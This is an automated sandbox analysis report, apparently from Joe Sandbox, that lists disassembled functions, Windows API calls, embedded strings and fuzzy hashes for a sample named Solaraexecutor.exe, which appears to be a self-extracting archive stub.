Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 66ce6a6ecd6b25ff714cffb50e982333303d4f0396efeabd6a361886f72b8410
Instruction ID: 1097be44c584fda74f750682bb809953411627f6e9f8df417065444f1664ceb9
Opcode Fuzzy Hash: 66ce6a6ecd6b25ff714cffb50e982333303d4f0396efeabd6a361886f72b8410
Instruction Fuzzy Hash: 4501F4362857016BC312776E6CA992BA62ADBD27B27250235F915E2292EF20CD015275

Function 00D30EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00D311CF: ResetEvent.KERNEL32(?), ref: 00D311E1
Part of subcall function 00D311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D311F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D30F21
CloseHandle.KERNEL32(?,?), ref: 00D30F3B
DeleteCriticalSection.KERNEL32(?), ref: 00D30F54
CloseHandle.KERNEL32(?), ref: 00D30F60
CloseHandle.KERNEL32(?), ref: 00D30F6C

Part of subcall function 00D30FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D31206,?), ref: 00D30FEA
Part of subcall function 00D30FE4: GetLastError.KERNEL32(?), ref: 00D30FF6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: e203f4925fa2bd0045607e44fbacd3807fe4e672b4901b66d99d12bba692c4fa
Instruction ID: ec209d7471df7effdbcef58fa50ee3f60649d756cfd692becf93033761bf5157
Opcode Fuzzy Hash: e203f4925fa2bd0045607e44fbacd3807fe4e672b4901b66d99d12bba692c4fa
Instruction Fuzzy Hash: 3A015271100744EFC7229F68DC84BC6BBA9FF08751F000929F65A921A0C7757A54CB70

Function 00D4C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D4C817

Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4

_free.LIBCMT ref: 00D4C829
_free.LIBCMT ref: 00D4C83B
_free.LIBCMT ref: 00D4C84D
_free.LIBCMT ref: 00D4C85F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57d2f5adaa75350efe9676c7a9981db1dbe5e98396162817b4795ce26813f4d2
Instruction ID: 6a1b08b122c1f5738800a160e1da4c057bd9a8769349792abf34605d72692b60
Opcode Fuzzy Hash: 57d2f5adaa75350efe9676c7a9981db1dbe5e98396162817b4795ce26813f4d2
Instruction Fuzzy Hash: F2F06D72922300AF8664EB69E98AC0A73E9EB107517AC2819F508D7652CF70FC80CA74

Function 00D31FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D31FE5
_wcslen.LIBCMT ref: 00D31FF6
_wcslen.LIBCMT ref: 00D32006
_wcslen.LIBCMT ref: 00D32014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D2B371,?,?,00000000,?,?,?), ref: 00D3202F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 03f8f5817c8ed61cda6b35c45a7f4396a56b23d555b640fc751d786c67e2100f
Instruction ID: 73ac1e29844bdc4b53096b3e0630d8cfb830540e28fe46882d332888805f59de
Opcode Fuzzy Hash: 03f8f5817c8ed61cda6b35c45a7f4396a56b23d555b640fc751d786c67e2100f
Instruction Fuzzy Hash: A9F06D32008114BBCF261F58EC09D8E3F26EB40770F118015FA5A5A061CB72D665D6B0

Function 00D48900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D4891E

Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4

_free.LIBCMT ref: 00D48930
_free.LIBCMT ref: 00D48943
_free.LIBCMT ref: 00D48954
_free.LIBCMT ref: 00D48965

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e2c38c95dddda925a0314c69d571b4a19ba62d6766b73055733c395e72f133bc
Instruction ID: 867756885e03cce0f9e099ca0e685bfed8bebfa6be3842a545c328af74b60eae
Opcode Fuzzy Hash: e2c38c95dddda925a0314c69d571b4a19ba62d6766b73055733c395e72f133bc
Instruction Fuzzy Hash: E7F0DA718317229F864A7F14FC0352D3BA1FB247653050506F914D73B1DB324A41AFB5

Function 00D315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D317BC
_swprintf.LIBCMT ref: 00D3186B

Strings

%s: %s, xrefs: 00D317CB
%ls, xrefs: 00D31641, 00D31657

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: d37c11979df6adcc55d8a12153ab38eed4a55fa7d1902374445e5d85f89678c3
Instruction ID: 3ed11e8118dc898342fdc70b0b3d970708ec80a6b95b198e97ae38abc9adebbb
Opcode Fuzzy Hash: d37c11979df6adcc55d8a12153ab38eed4a55fa7d1902374445e5d85f89678c3
Instruction Fuzzy Hash: 7D51FB7D288302F6F6211AD48D47F357765EB15B05F288A06F7C6684E1C9E2E460A73F

Function 00D47F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe,00000104), ref: 00D47FAE
_free.LIBCMT ref: 00D48079
_free.LIBCMT ref: 00D48083

Strings

C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, xrefs: 00D47FA5, 00D47FAC, 00D47FDB, 00D48013

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
API String ID: 2506810119-1981919265
Opcode ID: 187b04bc8a1fdfe2f94298c5a08fa5ef32b856ffb3ec75be5e7aa194f2a7a4b5
Instruction ID: b8cadfa979dc513811285baf78f1116f481d343d26627265e2aebd7a892531ba
Opcode Fuzzy Hash: 187b04bc8a1fdfe2f94298c5a08fa5ef32b856ffb3ec75be5e7aa194f2a7a4b5
Instruction Fuzzy Hash: 1131AEB1A10318AFDB21DF99D8819AEBBFCEF95350F14406AF90497211DB718E44DB71

Function 00D431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D431FB
_abort.LIBCMT ref: 00D43306

Strings

RCC, xrefs: 00D43215
MOC, xrefs: 00D4320D

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 37c4bc4bb827792e23c3dfa5b3e6c2dddaf7b8c3210c554bbea1d1cb9f0cf92e
Instruction ID: cef9720ad1ec01abae2e266fa6ec05a9305dfd59a0df6bf721edaef23d484b7b
Opcode Fuzzy Hash: 37c4bc4bb827792e23c3dfa5b3e6c2dddaf7b8c3210c554bbea1d1cb9f0cf92e
Instruction Fuzzy Hash: C4415871900209AFCF15DF98CD82AEEBBB5FF48304F188159F904A7226D375EA50DB64

Function 00D27401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D27406

Part of subcall function 00D23BBA: __EH_prolog.LIBCMT ref: 00D23BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D274CD

Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00

Strings

SeRestorePrivilege, xrefs: 00D27460
SeSecurityPrivilege, xrefs: 00D2744B

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 47c2f8881c8beada76517bddde2696886badbca9e79a93972793b19ad94ebf05
Instruction ID: 342de607da754c996bff3511a8a976e8a0d45601ea0a2b73e9306d1b4fa9d67e
Opcode Fuzzy Hash: 47c2f8881c8beada76517bddde2696886badbca9e79a93972793b19ad94ebf05
Instruction Fuzzy Hash: F031A371D04368AADF21EBA4EC45BEEBBB9EF29308F084015F805E7281D7748A48C770

Function 00D3AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

EndDialog.USER32(?,00000001), ref: 00D3AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D3ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3ADC2

Strings

ASKNEXTVOL, xrefs: 00D3AD28

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 487eb83fb289e45c742f80250c073c2c81443acc0684692480b26c5192108597
Instruction ID: a716cd1de72a0ef60fe1016d23d04dc60cf7e4907894c7831e674a60479c68bf
Opcode Fuzzy Hash: 487eb83fb289e45c742f80250c073c2c81443acc0684692480b26c5192108597
Instruction Fuzzy Hash: 1C11D332390310AFD7118F6CFC05F6A7769EF5A702F050000F2C0DB6A0DB6199199732

Function 00D2D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00D2D954
_strncpy.LIBCMT ref: 00D2D99A

Part of subcall function 00D31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D61030,00000200,00D2D928,00000000,?,00000050,00D61030), ref: 00D31DC4

Strings

@%s, xrefs: 00D2D93E
$%s, xrefs: 00D2D949

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 1ad9855241743f58e1d2513598bc88d6b73d1e5a4552ce00a0e26ccc30ca943f
Instruction ID: 8836009e910e1fc651749ad1b343c06e602d99af44b7ffb29fa705ffbb3d8c18
Opcode Fuzzy Hash: 1ad9855241743f58e1d2513598bc88d6b73d1e5a4552ce00a0e26ccc30ca943f
Instruction Fuzzy Hash: FB219D32440258AEEF21EEA4DC05FEE7BA9EF15348F040422FD51961A2E272D6888F71

Function 00D30E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E9F

Strings

Thread pool initialization failed., xrefs: 00D30EB7

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: c6f95b415a5366a50cc7af1580fb4ee96c3449f9868d6a501347ea798a399951
Instruction ID: 8f279b51c931a59c65ad0831079ec84067e5b4e934a79563ec6a65f14d804448
Opcode Fuzzy Hash: c6f95b415a5366a50cc7af1580fb4ee96c3449f9868d6a501347ea798a399951
Instruction Fuzzy Hash: 49119EB17407089FC3215F6A9C84AA7FFECEB68794F144C2EF5DAC2200D6B199409B70

Function 00D3B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

EndDialog.USER32(?,00000001), ref: 00D3B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D3B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00D3B304

Strings

GETPASSWORD1, xrefs: 00D3B289

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 9b58bffb8d5955ac351dfed865e7cfcc095d9c1ad0919d3d4b5e24e454681bf2
Instruction ID: 5feee5be4cd8cf116343959f95753f1f1f89886bef95fb446e8d7870facb5f33
Opcode Fuzzy Hash: 9b58bffb8d5955ac351dfed865e7cfcc095d9c1ad0919d3d4b5e24e454681bf2
Instruction Fuzzy Hash: 2E11A536900228BADB119B64AC49FFF376CEB59724F140522FB86F6180C7A0D94597B5

Function 00D3DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00D3DD1C, 00D3DD50
RENAMEDLG, xrefs: 00D3DD31

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 697e999d60607a01bdd98e7b9ffcfe081873be5716a2f763471754d662e03326
Instruction ID: 4e200c5ff4db75ef60c12f187fdf1244a56b114834a65fdecd3eca031e425449
Opcode Fuzzy Hash: 697e999d60607a01bdd98e7b9ffcfe081873be5716a2f763471754d662e03326
Instruction Fuzzy Hash: 7901847A604345AFDB118F68FC44A567BAAF709394F040425F806D3330DA71D890EFB1

Function 00D49A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D49AA9
__alldvrm.LIBCMT ref: 00D49CAA
__alldvrm.LIBCMT ref: 00D49CCC

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: 1e348db7c68f204a8804f8c106f544d38270c6acbea20614d9a2e67217530b0c
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: D4A12572A043869FEB21CF2AC8E17AFFBE5EF55310F1841ADE8959B281C6349941C770

Function 00D2A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D27F69,?,?,?), ref: 00D2A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00D27F69,?), ref: 00D2A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00D27F69,?,?,?,?,?,?,?), ref: 00D2A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00D27F69,?,?,?,?,?,?,?,?,?,?), ref: 00D2A4C6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 9d55b5940606eedc9d062ea32e62e12414cd2d8dd3d1732b8f3fa5b86d85d987
Instruction ID: 3ddbb6c4f082df83f570b11f0d2b2950d8da35edf0beaab78876bea8b60ca381
Opcode Fuzzy Hash: 9d55b5940606eedc9d062ea32e62e12414cd2d8dd3d1732b8f3fa5b86d85d987
Instruction Fuzzy Hash: E541C1301483919BD721EF68EC45F9EBBE4DBA0308F080919B5E4D31C0D6A4DA4C9B73

Function 00D21100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D2112B
_wcslen.LIBCMT ref: 00D21153
